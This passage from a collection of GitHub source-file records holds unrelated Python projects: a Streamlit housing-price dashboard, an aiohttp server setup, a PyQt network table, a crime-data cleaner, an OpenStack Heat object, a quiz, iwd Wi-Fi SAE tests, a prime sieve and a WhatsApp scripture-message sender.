np.datetime_as_string(self.TODAY, unit='D')\r\n start_time = datetime.strptime(\"2023-01-01\", \"%Y-%m-%d\")\r\n end_time = datetime.strptime(today_string, \"%Y-%m-%d\")\r\n date_values = st.slider('SELECT A DATE RANGE',\r\n min_value=start_time,\r\n max_value=end_time,\r\n value=(start_time, end_time),\r\n format=\"YYYY-MM-DD\")\r\n return date_values[0], date_values[1]\r\n\r\n def clean_data(self, df, time_start='2023-01-01', time_end=TODAY):\r\n df = self.clean_datetime(df)\r\n df = self.get_week_and_month(df)\r\n df = self.select_time_range(df, time_start, time_end)\r\n return df\r\n\r\n def sidebar_select_seasonality(self):\r\n seasonality = st.sidebar.selectbox('Select a period', ['day', 'week', 'month'])\r\n if seasonality == 'day':\r\n seasonality = 'datetime'\r\n return seasonality\r\n\r\n def slider_price_limit(self):\r\n price_limit = st.slider('Select a maximum price',\r\n min_value=0, max_value=20000,\r\n value=(0, 5000))\r\n return price_limit[1]\r\n\r\n def plot_time_series(self, df, period, title, area=None):\r\n fig = px.line(df, x=period, y='prezzo',\r\n color=area,\r\n hover_data=[area],\r\n color_discrete_sequence=px.colors.qualitative.Pastel,\r\n template=\"plotly_white\",\r\n width=1000, height=600,\r\n )\r\n fig.update_layout(xaxis_title=\"Date\", yaxis_title=\"Price (euros)\",\r\n title={'text': title,'font': {'size': 24} }\r\n )\r\n st.plotly_chart(fig)\r\n\r\n def plot_average_italy(self, df, period, max_price=5000):\r\n avg_italy = self.get_week_and_month(df)\r\n avg_italy = avg_italy.groupby([period])['prezzo'].mean().reset_index()\r\n avg_italy = avg_italy.loc[avg_italy['prezzo'] <= max_price]\r\n self.plot_time_series(avg_italy, period, 'AVERAGE PRICE IN ITALY')\r\n\r\n def sidebar_select_regions(self):\r\n with st.sidebar:\r\n REGIONS_SELECTED = st.multiselect('Select regions', self.REGIONI, default=[\"Lombardia\"])\r\n return REGIONS_SELECTED\r\n\r\n def plot_average_by_region(self, df, period, regions, max_price=5000):\r\n avg_by_region = self.get_week_and_month(df)\r\n avg_by_region = avg_by_region.loc[df['regione'].str.title().isin(regions)]\r\n avg_by_region = avg_by_region.groupby([period, 'regione'])['prezzo'].mean().reset_index()\r\n avg_by_region = avg_by_region.loc[avg_by_region['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_region, period, 'AVERAGE PRICE BY REGION', 'regione')\r\n\r\n def sidebar_select_municipalities(self):\r\n df = self.load_data()\r\n with st.sidebar:\r\n MUNICIPALITIES_SELECTED = st.multiselect('Select cities', df['citta'].unique(), default=[\"Milano\"])\r\n return MUNICIPALITIES_SELECTED\r\n\r\n def plot_average_by_municipality(self, df, period, municipalities, max_price=5000):\r\n avg_by_municipality = self.get_week_and_month(df)\r\n avg_by_municipality = avg_by_municipality.loc[df['citta'].str.title().isin(municipalities)]\r\n avg_by_municipality = avg_by_municipality.groupby([period, 'citta'])['prezzo'].mean().reset_index()\r\n avg_by_municipality = avg_by_municipality.loc[avg_by_municipality['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_municipality, period, 'AVERAGE PRICE BY CITY', 'citta')\r\n\r\n def sidebar_select_city(self):\r\n df = self.load_data()\r\n with st.sidebar:\r\n CITY = st.selectbox('SELECT ONE CITY', df['citta'].unique())\r\n st.write('You selected:', CITY)\r\n return CITY\r\n\r\n def sidebar_select_neighbourhoods(self, municipality):\r\n df = self.load_data()\r\n df = df.loc[df['citta'].str.title() == municipality][['prezzo', 'quartiere', 'citta', 'regione']]\r\n freq = 
df['quartiere'].value_counts().sort_values(ascending=False)[0:5]\r\n with st.sidebar:\r\n NEIGHBOURHOODS_SELECTED = st.multiselect('Select neighbourhoods', list(df['quartiere'].unique()), default=list(freq.index))\r\n return NEIGHBOURHOODS_SELECTED\r\n\r\n def plot_average_by_neighbourhoods(self, df, period, city, neighbourhoods, max_price=5000):\r\n avg_by_neighborhood = self.get_week_and_month(df)\r\n avg_by_neighborhood = avg_by_neighborhood.loc[df['citta'].str.title() == city]\r\n avg_by_neighborhood = avg_by_neighborhood.loc[df['quartiere'].str.title().isin(neighbourhoods)]\r\n avg_by_neighborhood = avg_by_neighborhood.groupby([period, 'quartiere'])['prezzo'].mean().reset_index()\r\n avg_by_neighborhood = avg_by_neighborhood.loc[avg_by_neighborhood['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_neighborhood, period, 'AVERAGE PRICE BY NEIGHBOURHOODS', 'quartiere')\r\n\r\n def main(self, period, regions, municipalities, city, neighbourhoods, max_price=5000, time_start=\"01-01-2023\", time_end=TODAY):\r\n df = self.load_data()\r\n df = self.clean_data(df, time_start, time_end)\r\n\r\n #st.write(\"#### **AVERAGE PRICE IN ITALY\")\r\n self.plot_average_italy(df, period, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE PER REGION\")\r\n self.plot_average_by_region(df, period, regions, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE IN MUNICIPALITY\")\r\n self.plot_average_by_municipality(df, period, municipalities, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE PER NEIGHBORHOOD\")\r\n self.plot_average_by_neighbourhoods(df, period, city, neighbourhoods, max_price)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tommella90/italy-housing-prices","sub_path":"streamlit_app/time_series_analysis.py","file_name":"time_series_analysis.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"40349306599","text":"from aiohttp import web\nfrom routes_union import setup_routes\nfrom aiohttp_session import session_middleware\nfrom aiohttp_session.cookie_storage import EncryptedCookieStorage\nfrom aiohttp_session import SimpleCookieStorage\nimport hashlib\nfrom settings import *\nfrom middlewares.authorization import authorization\n\n\nasync def init_app(mode='prod'):\n middle = []\n if mode == 'test':\n middle.append(session_middleware(SimpleCookieStorage()))\n else:\n middle.append(session_middleware(EncryptedCookieStorage(hashlib.sha256(bytes(SECRET_KEY, 'utf-8')).digest())))\n\n middle.append(authorization)\n\n app = web.Application(\n middlewares=middle\n )\n setup_routes(app)\n\n return app\n\n\ndef main():\n app = init_app()\n web.run_app(app,\n host='127.0.0.1',\n port=8000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"motivation-zone/main","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34959001210","text":"from PyQt5.QtWidgets import QVBoxLayout, QTableWidget, QTableWidgetItem, QSizePolicy, QFrame, QSplitter\r\nfrom PyQt5.QtCore import Qt\r\nfrom dlls.functions import database_all_lookup\r\n\r\n\r\nclass NetTable:\r\n def __init__(self, tab_widget):\r\n self.main_layout = QVBoxLayout()\r\n self.main_layout.setContentsMargins(0, 0, 0, 0)\r\n self.main_layout.setSpacing(0)\r\n tab_widget.setLayout(self.main_layout)\r\n\r\n self.create_table()\r\n\r\n def 
create_table(self):\r\n separator_frame = QFrame()\r\n separator_frame.setStyleSheet(\"background-color: #414657;\")\r\n separator_frame.setFixedHeight(20)\r\n self.main_layout.addWidget(separator_frame)\r\n\r\n table = QTableWidget()\r\n self.main_layout.addWidget(table)\r\n\r\n column_headers = ['IP Address', 'MAC Address', 'Hostname', 'Status', 'Vendor']\r\n\r\n sample_data = [\r\n ['192.168.1.100', '00:11:22:33:44:55', 'SampleHost1', 'Up', 'Vendor1'],\r\n ['192.168.1.101', 'AA:BB:CC:DD:EE:FF', 'SampleHost2', 'Down', 'Vendor2'],\r\n ['192.168.1.102', '11:22:33:44:55:66', 'SampleHost3', 'Unknown', 'Vendor3'],\r\n ]\r\n\r\n table.setRowCount(len(sample_data) + 100)\r\n table.setColumnCount(len(column_headers))\r\n\r\n for row_idx, row_data in enumerate(sample_data):\r\n for col_idx, cell_value in enumerate(row_data):\r\n item = QTableWidgetItem(str(cell_value))\r\n table.setItem(row_idx, col_idx, item)\r\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\r\n\r\n # Network table settings\r\n table.verticalHeader().setVisible(False)\r\n table.setHorizontalHeaderLabels(column_headers)\r\n table.setFocusPolicy(Qt.NoFocus)\r\n\r\n table.setColumnWidth(0, 150)\r\n table.setColumnWidth(1, 150)\r\n table.setColumnWidth(2, 150)\r\n table.setColumnWidth(3, 150)\r\n table.setColumnWidth(4, 150)\r\n table.horizontalHeader().setStretchLastSection(True)\r\n table.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\r\n\r\n # Network table styling\r\n header_style = \"\"\"\r\n QHeaderView::section {\r\n background-color: #414657;\r\n font: yu gothic ui 25px;\r\n padding: 0px;\r\n border-left: 2px solid #000;\r\n color: #fff;\r\n }\r\n \"\"\"\r\n table.horizontalHeader().setStyleSheet(header_style)\r\n\r\n cell_style = \"\"\"\r\n QTableWidget::item {\r\n padding: 0px; /* Set the padding */\r\n border-right: 0px dotted transparent;\r\n border-bottom: 1px solid #6D7594;\r\n color: white;\r\n background-color: #323644;\r\n }\r\n\r\n QTableWidget::item:selected {\r\n color: #000;\r\n background-color: #fff; /* Set the background color for the selected tab */\r\n }\r\n \"\"\"\r\n table.setStyleSheet(cell_style)\r\n table.setSelectionBehavior(QTableWidget.SelectRows)\r\n\r\n # Set custom row height for all rows\r\n custom_row_height = 1\r\n for row in range(table.rowCount()):\r\n table.verticalHeader().setDefaultSectionSize(custom_row_height)\r\n","repo_name":"Russo5478/Remote-Monitoring-System","sub_path":"Version3/mainContent/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23023307219","text":"import urllib.request\r\nimport json\r\n\r\ndef cleanCrimeData():\r\n Listy = []\r\n PyStr= urllib.request.urlopen(\"https://data.buffalony.gov/resource/d6g9-xbgu.json\").read().decode().strip()\r\n stri = json.loads(PyStr)\r\n for i in range(0, len(stri)):\r\n if (\"latitude\" and \"longitude\") in stri[i]:\r\n Listy.append([float(stri[i][\"latitude\"]), float(stri[i][\"longitude\"]), stri[i][\"incident_type_primary\"], stri[i][\"hour_of_day\"]])\r\n a = sorted(Listy, key = lambda x:int(x[3]))\r\n return json.dumps(a)\r\n","repo_name":"charlessokolowski/Map-Project","sub_path":"Project 2/Crime_clean.py","file_name":"Crime_clean.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72822558471","text":"\"\"\"Supervisor Hardware monitor based on udev.\"\"\"\nfrom datetime 
import timedelta\nimport logging\nfrom pprint import pformat\nfrom typing import Optional\n\nimport pyudev\n\nfrom ..coresys import CoreSys, CoreSysAttributes\nfrom ..resolution.const import UnhealthyReason\nfrom ..utils import AsyncCallFilter\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\n\nclass HwMonitor(CoreSysAttributes):\n \"\"\"Hardware monitor for supervisor.\"\"\"\n\n def __init__(self, coresys: CoreSys):\n \"\"\"Initialize Hardware Monitor object.\"\"\"\n self.coresys: CoreSys = coresys\n self.context = pyudev.Context()\n self.monitor: Optional[pyudev.Monitor] = None\n self.observer: Optional[pyudev.MonitorObserver] = None\n\n async def load(self) -> None:\n \"\"\"Start hardware monitor.\"\"\"\n try:\n self.monitor = pyudev.Monitor.from_netlink(self.context)\n self.observer = pyudev.MonitorObserver(self.monitor, self._udev_events)\n except OSError:\n self.sys_resolution.unhealthy = UnhealthyReason.PRIVILEGED\n _LOGGER.critical(\"Not privileged to run udev monitor!\")\n else:\n self.observer.start()\n _LOGGER.info(\"Started Supervisor hardware monitor\")\n\n async def unload(self) -> None:\n \"\"\"Shutdown sessions.\"\"\"\n if self.observer is None:\n return\n\n self.observer.stop()\n _LOGGER.info(\"Stopped Supervisor hardware monitor\")\n\n def _udev_events(self, action: str, device: pyudev.Device):\n \"\"\"Incoming events from udev.\n\n This is inside an observer thread and needs to be passed into our event loop.\n \"\"\"\n _LOGGER.debug(\"Hardware monitor: %s - %s\", action, pformat(device))\n self.sys_loop.call_soon_threadsafe(self._async_udev_events, action, device)\n\n def _async_udev_events(self, action: str, device: pyudev.Device):\n \"\"\"Incoming events from udev into the loop.\"\"\"\n # Sound changes\n if device.subsystem == \"sound\":\n self._action_sound(device)\n\n @AsyncCallFilter(timedelta(seconds=5))\n def _action_sound(self, device: pyudev.Device):\n \"\"\"Process sound actions.\"\"\"\n _LOGGER.info(\"Detecting changed audio hardware\")\n self.sys_loop.call_later(5, self.sys_create_task, self.sys_host.sound.update())\n","repo_name":"OpenPeerPower/supervisor","sub_path":"supervisor/misc/hwmon.py","file_name":"hwmon.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5069590760","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"SyncPoint object.\"\"\"\n\nfrom oslo_versionedobjects import base\nfrom oslo_versionedobjects import fields\n\nfrom heat.db import api as db_api\nfrom heat.objects import base as heat_base\nfrom heat.objects import fields as heat_fields\n\n\nclass SyncPoint(\n heat_base.HeatObject,\n base.VersionedObjectDictCompat,\n base.ComparableVersionedObject,\n):\n\n fields = {\n 'entity_id': fields.StringField(),\n 'traversal_id': fields.StringField(),\n 'is_update': fields.BooleanField(),\n 'created_at': fields.DateTimeField(read_only=True),\n 'updated_at': fields.DateTimeField(nullable=True),\n 'atomic_key': fields.IntegerField(),\n 'stack_id': fields.StringField(),\n 'input_data': heat_fields.JsonField(nullable=True),\n }\n\n @staticmethod\n def _from_db_object(context, sdata, db_sdata):\n if db_sdata is None:\n return None\n for field in sdata.fields:\n sdata[field] = db_sdata[field]\n sdata._context = context\n sdata.obj_reset_changes()\n return sdata\n\n @classmethod\n def get_by_key(cls,\n context,\n entity_id,\n traversal_id,\n is_update):\n sync_point_db = db_api.sync_point_get(context,\n entity_id,\n traversal_id,\n is_update)\n return cls._from_db_object(context, cls(), sync_point_db)\n\n @classmethod\n def create(cls, context, values):\n sync_point_db = db_api.sync_point_create(context, values)\n return cls._from_db_object(context, cls(), sync_point_db)\n\n @classmethod\n def update_input_data(cls,\n context,\n entity_id,\n traversal_id,\n is_update,\n atomic_key,\n input_data):\n return db_api.sync_point_update_input_data(\n context,\n entity_id,\n traversal_id,\n is_update,\n atomic_key,\n input_data)\n\n @classmethod\n def delete_all_by_stack_and_traversal(cls,\n context,\n stack_id,\n traversal_id):\n return db_api.sync_point_delete_all_by_stack_and_traversal(\n context,\n stack_id,\n traversal_id)\n","repo_name":"openstack/heat","sub_path":"heat/objects/sync_point.py","file_name":"sync_point.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"27294228182","text":"\r\n# Question\r\n\r\nimport random\r\n\r\nclass Questions:\r\n def __init__(self, question, choice,answer, subject):\r\n self.question = question\r\n self.choice = choice\r\n self.answer = answer\r\n self.subject = subject\r\n\r\n def showQuestion(self):\r\n print('******************************************************')\r\n print(\"Soru:\", self.question)\r\n print(\"Seçenekler:\")\r\n for secenek, cevap in self.choice:\r\n print(secenek + \":\", cevap) \r\n\r\n def checkAnswer(self, selectAnswer):\r\n return selectAnswer == self.answer \r\n \r\n\r\n \r\nsoru_seti = {\r\n\r\n \"Soru 1\": {\r\n \"soru_metni\": \"8 * 4 kaçtir?\",\r\n \"secenekler\": {\r\n \"A\": \"24\",\r\n \"B\": \"32\",\r\n \"C\": \"36\",\r\n \"D\": \"40\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Matematik\"\r\n },\r\n \"Soru 2\": {\r\n \"soru_metni\": \"Karekökü 25 olan sayi hangisidir?\",\r\n \"secenekler\": {\r\n \"A\": \"3\",\r\n \"B\": \"5\",\r\n \"C\": \"7\",\r\n \"D\": \"9\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Matematik\"\r\n },\r\n \"Soru 3\": {\r\n \"soru_metni\": \"Türkiye'nin başkenti hangi şehirdir?\",\r\n \"secenekler\": {\r\n \"A\": \"İstanbul\",\r\n \"B\": \"Ankara\",\r\n \"C\": \"İzmir\",\r\n \"D\": \"Antalya\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Coğrafya\"\r\n },\r\n \"Soru 4\": {\r\n 
\"soru_metni\": \"Dünyanin en yüksek daği hangisidir?\",\r\n \"secenekler\": {\r\n \"A\": \"Mont Blanc\",\r\n \"B\": \"Everest\",\r\n \"C\": \"Kilimanjaro\",\r\n \"D\": \"K2\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Coğrafya\"\r\n },\r\n \"Soru 5\": {\r\n \"soru_metni\": \"Osmanli İmparatorluğu'nun son dönem padişahi kimdir?\",\r\n \"secenekler\": {\r\n \"A\": \"II. Mahmud\",\r\n \"B\": \"III. Mustafa\",\r\n \"C\": \"II. Abdülhamid\",\r\n \"D\": \"V. Mehmed Reşad\"\r\n },\r\n \"dogru_cevap\": \"D\",\r\n \"konu\":\"Tarih\"\r\n },\r\n \"Soru 6\": {\r\n \"soru_metni\": \"I. Dünya Savaşi'nin başlangiç tarihi nedir?\",\r\n \"secenekler\": {\r\n \"A\": \"1912\",\r\n \"B\": \"1914\",\r\n \"C\": \"1916\",\r\n \"D\": \"1918\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Tarih\"\r\n },\r\n \"Soru 7\": {\r\n \"soru_metni\": \"Hangisi William Shakespeare'in oyunlarndan biridir?\",\r\n \"secenekler\": {\r\n \"A\": \"Hamlet\",\r\n \"B\": \"Don Kişot\",\r\n \"C\": \"Suç ve Ceza\",\r\n \"D\": \"Sefiller\"\r\n },\r\n \"dogru_cevap\": \"A\",\r\n \"konu\":\"Edebiyat\"\r\n },\r\n \"Soru 8\": {\r\n \"soru_metni\": \"Türk edebiyatinda 'Halit Ziya Uşakligil' hangi dönemin yazaridir?\",\r\n \"secenekler\": {\r\n \"A\": \"Tanzimat Dönemi\",\r\n \"B\": \"Servet-i Fünun Dönemi\",\r\n \"C\": \"Milli Edebiyat Dönemi\",\r\n \"D\": \"Cumhuriyet Dönemi\"\r\n },\r\n \"dogru_cevap\": \"A\",\r\n \"konu\":\"Edebiyat\"\r\n }\r\n}\r\n\r\n\r\ndef processMain():\r\n for soruSec in range(4):\r\n # Rastgele soru seçer\r\n soruSec = random.choice(list(soru_seti.keys()))\r\n\r\n question = soru_seti[soruSec]['soru_metni']\r\n choices = soru_seti[soruSec]['secenekler'].items()\r\n answer = soru_seti[soruSec]['dogru_cevap']\r\n subject = soru_seti[soruSec]['konu']\r\n\r\n q1 = Questions(question,choices,answer,subject)\r\n q1.showQuestion()\r\n del soru_seti[soruSec]\r\n answerQuestion(q1)\r\n\r\n \r\ndef answerQuestion(question):\r\n selectAnswer = str(input(\"Cevap şikkini giriniz : \"))\r\n if question.checkAnswer(selectAnswer):\r\n print('Tebrikler. cevabi bildiniz')\r\n else:\r\n print(f'Maalesef, yanliş cevap.. 
DOĞRU CEVAP {question.answer}') \r\n\r\n\r\n\r\nprocessMain()\r\n\r\n\r\n\r\n","repo_name":"TriTetra/python_ogrendiklerim","sub_path":"Demos/6.OOP/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72361110792","text":"#!/usr/bin/python3\n\nimport unittest\nimport sys\n\nsys.path.append('../util')\nimport iwd\nfrom iwd import IWD\nfrom iwd import PSKAgent\nfrom iwd import NetworkType\nfrom hostapd import HostapdCLI\nimport testutil\n\nclass Test(unittest.TestCase):\n\n def validate_connection(self, wd):\n psk_agent = PSKAgent(\"secret123\")\n wd.register_psk_agent(psk_agent)\n\n devices = wd.list_devices(1)\n self.assertIsNotNone(devices)\n device = devices[0]\n\n device.disconnect()\n\n network = device.get_ordered_network('ssidSAE', full_scan=True)\n\n self.assertEqual(network.type, NetworkType.psk)\n\n network.network_object.connect()\n\n condition = 'obj.state == DeviceState.connected'\n wd.wait_for_object_condition(device, condition)\n\n wd.wait(2)\n\n testutil.test_iface_operstate(intf=device.name)\n testutil.test_ifaces_connected(if0=device.name, if1=self.hostapd.ifname)\n\n device.disconnect()\n\n condition = 'not obj.connected'\n wd.wait_for_object_condition(network.network_object, condition)\n\n wd.unregister_psk_agent(psk_agent)\n\n def test_SAE(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '19')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_force_group_19(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '19')\n # Vendor data from APs which require group 19 be used first\n # TODO: (for all tests) verify the expected group was used\n self.hostapd.set_value('vendor_elements', 'dd0cf4f5e8050500000000000000')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_Group20(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '20')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_H2E(self):\n self.hostapd.set_value('sae_pwe', '1')\n self.hostapd.set_value('sae_groups', '19')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_H2E_Group20(self):\n self.hostapd.set_value('sae_pwe', '1')\n self.hostapd.set_value('sae_groups', '20')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def setUp(self):\n self.wd = IWD(True)\n\n def tearDown(self):\n self.wd.clear_storage()\n self.wd = None\n\n @classmethod\n def setUpClass(cls):\n cls.hostapd = HostapdCLI(config='ssidSAE.conf')\n\n @classmethod\n def tearDownClass(cls):\n pass\n\nif __name__ == '__main__':\n unittest.main(exit=True)\n","repo_name":"illiliti/eiwd","sub_path":"autotests/testSAE/connection_test.py","file_name":"connection_test.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"30364892780","text":"#!/usr/bin/env python3\n\"\"\"Sieve of 
Eratosthenes.\"\"\"\n\nimport logging\nimport threading\nimport typing\n\nfrom collections.abc import Sequence\n\ndef sieve(n: int) -> list[int]:\n \"\"\"Returns the list of prime numbers up to and including N.\"\"\"\n if n < 2:\n return []\n size = n + 1\n is_prime = [True] * size # One slot for each int up to n.\n is_prime[0:2] = (False, False) # 0 and 1 are not primes.\n for p in range(size):\n if is_prime[p]:\n for v in range(p * p, size, p if p < 3 else 2 * p):\n is_prime[v] = False\n return [p for p in range(size) if is_prime[p]]\n\ndef is_prime(n: int) -> bool:\n \"\"\"Checks if a positive integer N is a prime number by brute force.\"\"\"\n return n > 1 and all(n % d != 0 for d in range(2, n // 2 + 1))\n\ndef bsearch(n: int, ary: Sequence[int]) -> typing.Optional[int]:\n \"\"\"Finds the array index of the highest element of ARY equal to or less than N, or None\"\"\"\n if not ary or n < ary[0]:\n return None\n if n >= ary[-1]:\n return len(ary) - 1\n lo = 0\n hi = len(ary)\n while hi - lo > 1:\n mid = (hi + lo + 1) // 2\n v = ary[mid]\n if n == v:\n return mid\n elif n > v:\n lo = mid\n else: # n < v\n hi = mid\n return lo\n\n_primes: list[int] = [] # Cache of previously calculated primes\n_primes_lock = threading.Lock() # Concurrency lock for _primes\n\ndef isieve(n: int) -> list[int]:\n \"\"\"Incremental sieve.\"\"\"\n global _primes\n global _primes_lock\n if n < 2:\n return []\n with _primes_lock:\n last_idx = len(_primes) - 1\n hi_idx = bsearch(n, _primes)\n if hi_idx is None: # hi_idx == 0 is a valid found prime\n # Use the non-incremental algorithm.\n _primes = sieve(n)\n return _primes[:]\n elif hi_idx < last_idx:\n # n is in the middle; return copy slice of _primes\n return _primes[:hi_idx + 1]\n elif hi_idx == last_idx:\n # extend primes if necessary, then return a copy\n extension = additional(n, _primes)\n _primes.extend(extension)\n return _primes[:]\n else:\n raise IndexError(f'invalid index: {hi_idx} vs {last_idx}')\n\ndef additional(n: int, previous_primes: Sequence[int]) -> list[int]:\n vbase = previous_primes[-1] if previous_primes else 1\n if n < 2 or n == vbase:\n return []\n # Create a scratch array for numbers between the previous_primes and n.\n is_prime = [True] * (n - vbase) # does not include vbase\n def i2v(i: int) -> int:\n \"\"\"Maps an is_prime array index to the integer value it represents.\"\"\"\n return vbase + i + 1\n def v2i(v: int) -> int:\n \"\"\"Maps a value to an is_prime index.\"\"\"\n return v - vbase - 1\n # Mark array with multiples of previous primes\n if previous_primes:\n for i in range(len(is_prime)):\n value_to_check = i2v(i)\n for p in previous_primes:\n if value_to_check % p == 0:\n is_prime[i] = False\n break\n # Identify new primes to be returned.\n new_primes = []\n # Mark is_prime for newly discovered primes\n for i in range(len(is_prime)):\n p = i2v(i)\n if is_prime[i]:\n new_primes.append(p)\n for v in range(p * p, n + 1, p if p == 2 else 2 * p):\n k = v2i(v)\n is_prime[k] = False\n return new_primes\n\ndef generate(lo: int, hi: int) -> typing.Generator[int, None, None]:\n \"\"\"Generates prime numbers between LO and HI inclusive.\"\"\"\n primes = []\n candidate = 2\n increment = 1\n while candidate <= hi:\n # Implementation below is faster than using\n # is_prime = all(candidate % p != 0 for p in primes)\n # possibly because of generator creation with all().\n is_prime = True\n for p in primes:\n if candidate % p == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(candidate)\n if candidate >= lo:\n yield candidate\n 
candidate += increment\n increment = 2\n","repo_name":"ghst659/primes","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8849597590","text":"from selenium import webdriver\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException, \\\n UnexpectedAlertPresentException, NoAlertPresentException\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\nfrom urllib.parse import quote\nfrom sys import platform\n\nimport time\nfrom year import year\nfrom Phone_Numbers import numbers\n\ndef text_required():\n month = time.localtime().tm_mon - 1\n day = time.localtime().tm_mday - 1\n\n today_text = f'Today\\'s Bible Portion : {year[month][day]}'\n return today_text\n\n\noptions = Options()\nif platform == \"win32\":\n options.binary_location = r\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\n\nmessage = \"Ignore Me\" # text_required()\nmessage = quote(message)\n\n\ntotal_number = len(numbers)\ndelay = 30\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get('https://web.whatsapp.com')\n\ninput(\"Press ENTER after login into Whatsapp Web and your chats are visible\t.\")\n\nfor idx, number in enumerate(numbers):\n number = number.strip()\n\n if number == \"\":\n continue\n\n print('{}/{} => Sending message to {}.'.format((idx + 1), total_number, number))\n\n try:\n url = 'https://web.whatsapp.com/send?phone=' + number + '&text=' + message\n sent = False\n\n for i in range(3):\n\n if not sent:\n driver.get(url)\n\n try:\n click_btn = WebDriverWait(driver, delay).until(\n EC.element_to_be_clickable((By.CLASS_NAME, '_4sWnG')))\n except Exception as e:\n print(f\"Something went wrong..\\n Failed to send message to: {number}, retry ({i + 1}/3)\")\n print(\"Make sure your phone and computer is connected to the internet.\")\n print(\"If there is an alert, please dismiss it.\")\n input(\"Press enter to continue\")\n\n else:\n sleep(1)\n click_btn.click()\n sent = True\n sleep(3)\n print('Message sent to: ' + number)\n\n except Exception as e:\n print('Failed to send message to ' + number + str(e))","repo_name":"Grace-Hephzibah/Automate_Daily_Scripture_Portion","sub_path":"Automation.py","file_name":"Automation.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32143095669","text":"from typing import List\nfrom math import inf\n\nclass Solution:\n def matchCount(self, word1, word2):\n return len([i for i in range(len(word1)) if word1[i] == word2[i]])\n \n \n def expectationOfElemination(self, words, target):\n chanceOfMatchCnt = [0,0,0,0,0,0,0]\n for word in words:\n matchCnt = self.matchCount(word, target)\n chanceOfMatchCnt[matchCnt] += 1\n \n chanceOfMatchCnt = [n/len(words) for n in chanceOfMatchCnt]\n expectation = 0\n for matchCnt in range(6):\n eliminateCnt = 0\n for word in words:\n if self.matchCount(word, target) != matchCnt:\n eliminateCnt += 1\n \n expectation += chanceOfMatchCnt[matchCnt] * eliminateCnt\n \n return expectation\n\n def findSecretWord(self, wordlist: List[str], master: 'Master') -> None:\n candidates = 
